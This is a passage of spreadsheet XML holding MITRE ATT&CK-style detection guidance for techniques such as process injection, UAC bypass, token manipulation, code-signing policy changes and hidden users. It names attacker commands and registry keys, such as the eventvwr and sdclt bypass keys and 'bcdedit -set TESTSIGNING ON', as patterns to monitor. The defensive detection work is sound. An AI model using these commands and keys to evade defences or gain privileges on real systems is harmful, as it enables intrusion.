    <t>Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO)</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)
Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>The removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag when performing updates. 
Review &lt;code&gt;false&lt;/code&gt; values under the &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry in an application's &lt;code&gt;Info.plist&lt;/code&gt; file (required by every application). &lt;code&gt;false&lt;/code&gt; under &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry will default to not setting the quarantine flag. 
QuarantineEvents is a SQLite database containing a list of all files assigned the &lt;code&gt;com.apple.quarantine&lt;/code&gt; attribute, located at &lt;code&gt;~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2&lt;/code&gt;. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as &lt;code&gt;HKCU\Software\Policies\Microsoft\Windows NT\Driver Signing&lt;/code&gt;. Modifications to the code signing policy of a system are likely to be rare.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.
Lack of expected log events may be suspicious.</t>
  </si>
  <si>
    <t>Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories.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Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Virtualization/sandbox related system checks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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t xml:space="preserve">User activity-based checks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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. </t>
  </si>
  <si>
    <t xml:space="preserve">Time-based evasion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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. </t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious behaviors that could relate to post-compromise behavior.
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances. for known bad sequence of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;WriteProcessMemory()&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; with the parameter set to &lt;code&gt;ProcessBasicInformation&lt;/code&gt; may be used for this technique.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.</t>
  </si>
  <si>
    <t xml:space="preserve">File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;LogonUser&lt;/code&gt; and &lt;code&gt; SetThreadToken&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;FindWindow&lt;/code&gt;, &lt;code&gt;FindWindowEx&lt;/code&gt;, &lt;code&gt;EnumWindows&lt;/code&gt;, &lt;code&gt;EnumChildWindows&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be abused for this technique. 
Consider monitoring for excessive use of &lt;code&gt;SendMessage&lt;/code&gt; and/or &lt;code&gt;PostMessage&lt;/code&gt; API functions with &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and/or &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; arguments.
Analyze process behavior to determine if a process is performing unusual actions, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;CreateRemoteThread&lt;/code&gt; and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell &lt;code&gt;Get-ADUser&lt;/code&gt; cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
Analysts can also monitor for use of Windows APIs such as &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;, &lt;code&gt; ImpersonateLoggedOnUser &lt;/code&gt;, and &lt;code&gt; SetThreadToken &lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>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Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.</t>
  </si>
  <si>
    <t>Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Monitor for PowerShell commands such as: &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name"&lt;/code&gt;, or &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain&lt;/code&gt;.(Citation: Microsoft - Update or Repair Federated domain)</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;CreateRemoteThread&lt;/code&gt; and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>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&lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Processing hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process’ thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
* Event ID 5136 - A directory service object was modified
* Event ID 5137 - A directory service object was created
* Event ID 5138 - A directory service object was undeleted
* Event ID 5139 - A directory service object was moved
* Event ID 5141 - A directory service object was deleted
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; and &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;CPLs&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.
On Windows systems, monitor for creation of suspicious inbox rules through the use of the &lt;code&gt;New-InboxRule&lt;/code&gt; and &lt;code&gt;Set-InboxRule&lt;/code&gt; PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the &lt;code&gt;RulesActiveState.plist&lt;/code&gt;, &lt;code&gt;SyncedRules.plist&lt;/code&gt;, &lt;code&gt;UnsyncedRules.plist&lt;/code&gt;, and &lt;code&gt;MessageRules.plist&lt;/code&gt; files.(Citation: MacOS Email Rules)</t>
  </si>
  <si>
    <t>Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs. 
Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; key.
In macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the &lt;code&gt;Hide500Users&lt;/code&gt; key value to &lt;code&gt;TRUE&lt;/code&gt; in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file. Monitor the command line for usage of the &lt;code&gt;dscl . create&lt;/code&gt; command with the &lt;code&gt;IsHidden&lt;/code&gt; attribute set to &lt;code&gt;1&lt;/code&gt;.(Citation: Apple Support Hide a User Account) </t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a &lt;code&gt;\*&lt;/code&gt; in front of the "Startup" value name: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\["\*Startup"="{Path}"]&lt;/code&gt; or by adding a key to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal&lt;/code&gt;.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)
Monitor execution of processes and commands associated with making configuration changes to boot settings, such as &lt;code&gt;bcdedit.exe&lt;/code&gt; and &lt;code&gt;bootcfg.exe&lt;/code&gt;.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)</t>
  </si>
  <si>
    <t>Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)
Analyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.</t>
  </si>
  <si>
    <t xml:space="preserve">Identify files with the &lt;code&gt;com.apple.ResourceFork&lt;/code&gt; extended attribute and large data amounts stored in resource forks. 
Monitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. </t>
  </si>
  <si>
    <t>Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.
Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. &lt;code&gt;-silent&lt;/code&gt;, &lt;code&gt;-ignore-reboot&lt;/code&gt;), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. &lt;code&gt;VBoxManage startvm $VM --type headless&lt;/code&gt;).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. &lt;code&gt;VBoxManage.exe setextradata global GUI/SuppressMessages "all"&lt;/code&gt;).
Monitor for commands which enable hypervisors such as Hyper-V.  If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. 
